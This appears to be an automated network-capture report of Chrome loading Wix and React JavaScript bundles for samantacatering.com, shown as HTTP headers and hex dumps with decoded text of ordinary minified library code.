                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 75 73 70 65 6e 73 65 22 29 2c 7a 61 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 6d 65 6d 6f 22 29 2c 41 61 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2e 6c 61 7a 79 22 29 2c 56 3d 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 2c 58 3d 7b 69 73 4d 6f 75 6e 74 65 64 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 31 7d 2c 65 6e 71 75 65 75 65 46 6f 72 63 65 55 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 7d 2c 65 6e 71 75 65 75 65 52 65 70 6c 61 63 65 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 6d 29 7b 7d 2c 65 6e 71 75 65 75 65 53 65 74 53 74 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 6d 29 7b 7d 7d 2c 6c 61 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 2c 57 3d 7b 7d 3b
                                                                                                                                                                                                                        Data Ascii: uspense"),za=Symbol.for("react.memo"),Aa=Symbol.for("react.lazy"),V=Symbol.iterator,X={isMounted:function(a){return!1},enqueueForceUpdate:function(a,b,c){},enqueueReplaceState:function(a,b,c,m){},enqueueSetState:function(a,b,c,m){}},la=Object.assign,W={};
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 67 61 74 6f 72 2e 73 63 68 65 64 75 6c 69 6e 67 2e 69 73 49 6e 70 75 74 50 65 6e 64 69 6e 67 26 26 6e 61 76 69 67 61 74 6f 72 2e 73 63 68 65 64 75 6c 69 6e 67 2e 69 73 49 6e 70 75 74 50 65 6e 64 69 6e 67 2e 62 69 6e 64 28 6e 61 76 69 67 61 74 6f 72 2e 73 63 68 65 64 75 6c 69 6e 67 29 3b 76 61 72 20 48 3d 21 31 2c 47 3d 6e 75 6c 6c 2c 41 3d 2d 31 2c 69 61 3d 35 2c 68 61 3d 2d 31 2c 55 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6e 75 6c 6c 21 3d 3d 47 29 7b 76 61 72 20 61 3d 76 28 29 3b 68 61 3d 61 3b 76 61 72 20 62 3d 21 30 3b 74 72 79 7b 62 3d 47 28 21 30 2c 61 29 7d 66 69 6e 61 6c 6c 79 7b 62 3f 49 28 29 3a 28 48 3d 21 31 2c 47 3d 6e 75 6c 6c 29 7d 7d 65 6c 73 65 20 48 3d 21 31 7d 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20
                                                                                                                                                                                                                        Data Ascii: gator.scheduling.isInputPending&&navigator.scheduling.isInputPending.bind(navigator.scheduling);var H=!1,G=null,A=-1,ia=5,ha=-1,U=function(){if(null!==G){var a=v();ha=a;var b=!0;try{b=G(!0,a)}finally{b?I():(H=!1,G=null)}}else H=!1};if("function"===typeof
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 2c 52 28 53 29 29 29 3b 72 65 74 75 72 6e 20 61 7d 2c 75 6e 73 74 61 62 6c 65 5f 63 61 6e 63 65 6c 43 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 63 61 6c 6c 62 61 63 6b 3d 6e 75 6c 6c 7d 2c 75 6e 73 74 61 62 6c 65 5f 77 72 61 70 43 61 6c 6c 62 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 0a 6b 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 63 3d 6b 3b 6b 3d 62 3b 74 72 79 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 69 6e 61 6c 6c 79 7b 6b 3d 63 7d 7d 7d 2c 75 6e 73 74 61 62 6c 65 5f 67 65 74 43 75 72 72 65 6e 74 50 72 69 6f 72 69 74 79 4c 65 76 65 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6b 7d 2c 75 6e 73 74 61 62 6c
                                                                                                                                                                                                                        Data Ascii: ,R(S)));return a},unstable_cancelCallback:function(a){a.callback=null},unstable_wrapCallback:function(a){var b=k;return function(){var c=k;k=b;try{return a.apply(this,arguments)}finally{k=c}}},unstable_getCurrentPriorityLevel:function(){return k},unstabl
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 5f 6f 77 6e 65 72 3b 69 66 28 6e 75 6c 6c 21 3d 62 29 7b 76 6f 69 64 20 30 21 3d 3d 62 2e 72 65 66 26 26 28 6b 3d 62 2e 72 65 66 2c 68 3d 4c 2e 63 75 72 72 65 6e 74 29 3b 76 6f 69 64 20 30 21 3d 3d 62 2e 6b 65 79 26 26 28 64 3d 22 22 2b 62 2e 6b 65 79 29 3b 69 66 28 61 2e 74 79 70 65 26 26 61 2e 74 79 70 65 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 29 76 61 72 20 6c 3d 61 2e 74 79 70 65 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3b 66 6f 72 28 66 20 69 6e 20 62 29 61 61 2e 63 61 6c 6c 28 62 2c 66 29 26 26 21 62 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 66 29 26 26 28 65 5b 66 5d 3d 76 6f 69 64 20 30 3d 3d 3d 62 5b 66 5d 26 26 76 6f 69 64 20 30 21 3d 3d 6c 3f 6c 5b 66 5d 3a 62 5b 66 5d 29 7d 76 61 72 20 66 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74
                                                                                                                                                                                                                        Data Ascii: _owner;if(null!=b){void 0!==b.ref&&(k=b.ref,h=L.current);void 0!==b.key&&(d=""+b.key);if(a.type&&a.type.defaultProps)var l=a.type.defaultProps;for(f in b)aa.call(b,f)&&!ba.hasOwnProperty(f)&&(e[f]=void 0===b[f]&&void 0!==l?l[f]:b[f])}var f=arguments.lengt
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC673INData Raw: 63 2e 75 73 65 49 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2e 63 75 72 72 65 6e 74 2e 75 73 65 49 64 28 29 7d 3b 63 2e 75 73 65 49 6d 70 65 72 61 74 69 76 65 48 61 6e 64 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 67 2e 63 75 72 72 65 6e 74 2e 75 73 65 49 6d 70 65 72 61 74 69 76 65 48 61 6e 64 6c 65 28 61 2c 62 2c 63 29 7d 3b 63 2e 75 73 65 49 6e 73 65 72 74 69 6f 6e 45 66 66 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 67 2e 63 75 72 72 65 6e 74 2e 75 73 65 49 6e 73 65 72 74 69 6f 6e 45 66 66 65 63 74 28 61 2c 62 29 7d 3b 63 2e 75 73 65 4c 61 79 6f 75 74 45 66 66 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 67 2e 63 75 72 72 65 6e 74 2e 75
                                                                                                                                                                                                                        Data Ascii: c.useId=function(){return g.current.useId()};c.useImperativeHandle=function(a,b,c){return g.current.useImperativeHandle(a,b,c)};c.useInsertionEffect=function(a,b){return g.current.useInsertionEffect(a,b)};c.useLayoutEffect=function(a,b){return g.current.u


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        17192.168.2.54973734.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC412OUTGET /services/wix-thunderbolt/dist/main.renderer.a20626f8.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1148INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: gjZ_vS_5aj06HA8.Rgqos_hL3hvOm7Bb
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 940520359 858844017
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 231225477 211910547
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Sun, 05 Jan 2025 06:35:58 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 458199
                                                                                                                                                                                                                        Last-Modified: Sun, 05 Jan 2025 06:22:43 GMT
                                                                                                                                                                                                                        ETag: "17dc6142a5674dc31c4e4ac8ab3502fc"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC152INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 36 37 5d 2c 7b 36 35 38 39 3a 28 29 3d 3e 7b 7d 7d 2c 70 3d 3e 7b 76 61 72 20 73 3b 73 3d 36 35 38 39 2c 70 28 70 2e 73 3d 73 29 7d 5d 29 3b
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[867],{6589:()=>{}},p=>{var s;s=6589,p(p.s=s)}]);


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        18192.168.2.54973634.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC592OUTGET /services/wix-thunderbolt/dist/browser-deprecation.bundle.es5.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 6088
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: VDRrN5UudTkkknu04VZ5midL1F_A67EZ
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 200157668
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcydaHuKmePuYLvGovietlnc/MRAhrlVRxaXdYSRy7tLb
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Fri, 03 Jan 2025 02:05:31 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 647226
                                                                                                                                                                                                                        Last-Modified: Fri, 03 Jan 2025 01:23:16 GMT
                                                                                                                                                                                                                        ETag: "0022d406fbbd37299590c9dfcb9e8438"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC260INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 2f 2f 20 73 72 63 2f 72 65 70 6f 72 74 50 68 61 73 65 53 74 61 72 74 65 64 2e 74 73 0a 76 61 72 20 5f 77 69 6e 64 6f 77 3d 77 69 6e 64 6f 77 3b 66 75 6e 63 74 69 6f 6e 20 75 75 69 64 76 34 28 29 7b 72 65 74 75 72 6e 22 78 78 78 78 78 78 78 78 2d 78 78 78 78 2d 34 78 78 78 2d 79 78 78 78 2d 78 78 78 78 78 78 78 78 78 78 78 78 22 2e 72 65 70 6c 61 63 65 28 2f 5b 78 79 5d 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 72 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 31 36 7c 30 2c 76 3d 63 3d 3d 3d 22 78 22 3f 72 3a 72 26 33 7c 38 3b 72 65 74 75 72 6e 20 76 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 42 49 28 65 76 69 64 29 7b 76 61
                                                                                                                                                                                                                        Data Ascii: "use strict";(function(){// src/reportPhaseStarted.tsvar _window=window;function uuidv4(){return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,function(c){var r=Math.random()*16|0,v=c==="x"?r:r&3|8;return v.toString(16)})}function sendBI(evid){va
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 72 61 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 22 22 3b 76 61 72 20 5f 77 69 6e 64 6f 77 24 66 65 64 6f 70 73 24 64 61 74 61 3d 5f 77 69 6e 64 6f 77 2e 66 65 64 6f 70 73 2e 64 61 74 61 2c 73 69 74 65 3d 5f 77 69 6e 64 6f 77 24 66 65 64 6f 70 73 24 64 61 74 61 2e 73 69 74 65 2c 72 6f 6c 6c 6f 75 74 3d 5f 77 69 6e 64 6f 77 24 66 65 64 6f 70 73 24 64 61 74 61 2e 72 6f 6c 6c 6f 75 74 2c 66 6c 65 65 74 43 6f 6e 66 69 67 3d 5f 77 69 6e 64 6f 77 24 66 65 64 6f 70 73 24 64 61 74 61 2e 66 6c 65 65 74 43 6f 6e 66 69 67 2c 72 65 71 75 65 73 74 55 72 6c 3d 5f 77 69 6e 64 6f 77 24 66 65 64 6f 70 73 24 64 61 74 61 2e 72 65 71 75 65 73
                                                                                                                                                                                                                        Data Ascii: ra=arguments.length>1&&arguments[1]!==undefined?arguments[1]:"";var _window$fedops$data=_window.fedops.data,site=_window$fedops$data.site,rollout=_window$fedops$data.rollout,fleetConfig=_window$fedops$data.fleetConfig,requestUrl=_window$fedops$data.reques
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 75 72 61 74 69 6f 6e 3d 44 61 74 65 2e 6e 6f 77 28 29 2d 74 73 3b 73 65 6e 64 42 49 28 65 76 69 64 2c 22 26 6e 61 6d 65 3d 22 2e 63 6f 6e 63 61 74 28 70 68 61 73 65 2c 22 26 64 75 72 61 74 69 6f 6e 3d 22 29 2e 63 6f 6e 63 61 74 28 64 75 72 61 74 69 6f 6e 29 2e 63 6f 6e 63 61 74 28 65 78 74 72 61 3f 22 26 22 2b 65 78 74 72 61 3a 22 22 29 29 7d 2f 2f 20 73 72 63 2f 62 72 6f 77 73 65 72 2d 64 65 70 72 65 63 61 74 69 6f 6e 2e 74 73 0a 76 61 72 20 76 65 72 73 69 6f 6e 3d 22 76 35 22 3b 76 61 72 20 5f 77 69 6e 64 6f 77 32 3d 77 69 6e 64 6f 77 3b 76 61 72 20 5f 61 2c 5f 62 2c 5f 63 3b 76 61 72 20 75 73 65 72 41 67 65 6e 74 3d 28 28 5f 63 3d 28 5f 62 3d 28 5f 61 3d 5f 77 69 6e 64 6f 77 32 2e 6e 61 76 69 67 61 74 6f 72 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a
                                                                                                                                                                                                                        Data Ascii: uration=Date.now()-ts;sendBI(evid,"&name=".concat(phase,"&duration=").concat(duration).concat(extra?"&"+extra:""))}// src/browser-deprecation.tsvar version="v5";var _window2=window;var _a,_b,_c;var userAgent=((_c=(_b=(_a=_window2.navigator)==null?void 0:
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 65 22 2c 66 75 6e 63 74 69 6f 6e 20 6f 6e 52 65 61 64 79 53 74 61 74 65 43 68 61 6e 67 65 28 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3d 3d 3d 22 63 6f 6d 70 6c 65 74 65 22 29 7b 72 75 6e 44 65 70 72 65 63 61 74 69 6f 6e 46 6c 6f 77 28 29 7d 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 75 6e 44 65 70 72 65 63 61 74 69 6f 6e 46 6c 6f 77 28 29 7b 63 6c 65 61 72 44 6f 6d 46 72 6f 6d 53 53 52 28 29 3b 73 68 6f 77 44 65 70 72 65 63 61 74 69 6f 6e 4d 65 73 73 61 67 65 28 29 3b 72 65 70 6f 72 74 42 49 28 29 7d 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 42 6f 64 79 28 29 7b 76 61 72 20 68 65 61 64 3d 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68
                                                                                                                                                                                                                        Data Ascii: e",function onReadyStateChange(){if(document.readyState==="complete"){runDeprecationFlow()}})}}function runDeprecationFlow(){clearDomFromSSR();showDeprecationMessage();reportBI()}function hideBody(){var head=document.head||document.getElementsByTagName("h
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1390INData Raw: 73 3d 7b 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 3a 22 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 22 69 6e 20 77 69 6e 64 6f 77 2c 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 3a 22 49 6e 74 65 72 73 65 63 74 69 6f 6e 4f 62 73 65 72 76 65 72 22 69 6e 20 77 69 6e 64 6f 77 2c 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 3a 22 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 22 69 6e 20 77 69 6e 64 6f 77 2c 73 75 70 70 6f 72 74 73 43 73 73 56 61 72 73 3a 73 75 70 70 6f 72 74 73 43 73 73 56 61 72 73 28 29 2c 73 75 70 70 6f 72 74 73 43 73 73 47 72 69 64 3a 73 75 70 70 6f 72 74 73 43 73 73 47 72 69 64 28 29 2c 73 75 70 70 6f 72 74 73 45 53 32 30 31 37 3a 73 75 70 70 6f 72 74 73 45 53 32 30 31 37 28 29 2c 69 73 49 45 3a 69 73 49 45 7d 7d 63 61 74 63 68 28
                                                                                                                                                                                                                        Data Ascii: s={customElements:"customElements"in window,IntersectionObserver:"IntersectionObserver"in window,ResizeObserver:"ResizeObserver"in window,supportsCssVars:supportsCssVars(),supportsCssGrid:supportsCssGrid(),supportsES2017:supportsES2017(),isIE:isIE}}catch(
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC268INData Raw: 69 6e 67 43 6f 6d 6d 61 20 3d 20 7b 61 3a 20 31 2c 20 62 3a 20 32 2c 7d 22 29 3b 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 63 6f 6e 73 74 20 61 72 72 57 69 74 68 54 72 61 69 6c 69 6e 67 43 6f 6d 6d 61 20 3d 20 5b 31 2c 32 2c 33 2c 5d 22 29 3b 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 7b 7d 29 3b 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 28 7b 7d 29 3b 22 78 22 2e 70 61 64 53 74 61 72 74 28 33 2c 22 41 22 29 2e 70 61 64 45 6e 64 28 35 2c 22 42 22 29 3b 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 7b 61 3a 31 2c 62 3a 32 7d 2c 22 61 22 29 3b 4f 62 6a 65 63 74 2e 66 72 6f 6d 45 6e 74 72 69 65 73 28 5b 5b 22 61 22 2c 31 5d 5d 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 7d 72 65 74 75
                                                                                                                                                                                                                        Data Ascii: ingComma = {a: 1, b: 2,}");new Function("const arrWithTrailingComma = [1,2,3,]");Object.entries({});Object.values({});"x".padStart(3,"A").padEnd(5,"B");Object.getOwnPropertyDescriptor({a:1,b:2},"a");Object.fromEntries([["a",1]])}catch(e){return false}retu


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        19192.168.2.54973834.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC587OUTGET /services/tag-manager-client/1.920.0/siteTags.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC1114INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 9582
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: IpuiCfelhl6le_v08dnT_l.PD5DvKQW0
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 249154373 671728626
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 12:25:12 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 1992445
                                                                                                                                                                                                                        Last-Modified: Wed, 18 Dec 2024 12:14:50 GMT
                                                                                                                                                                                                                        ETag: "6f1af620740f6e8d6851e2794ba694d0"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:37 UTC276INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 65 3d 22 54 61 67 20 4d 61 6e 61 67 65 72 3a 20 22 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 21 31 3b 74 72 79 7b 63 6f 6e 73 74 20 74 3d 77 69 6e 64 6f 77 3b 65 3d 74 26 26 74 2e 64 65 62 75 67 7c 7c 74 2e 6c 6f 63 61 74 69 6f 6e 26 26 28 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 7c 7c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 64 65 62 75 67 3d 22 29 3e 2d 31 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 65 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 6e 29 7b 74 26 26 63 6f 6e 73 6f 6c 65 26 26 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 60 24 7b 65 7d 20 24 7b 6e 7d 60 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28
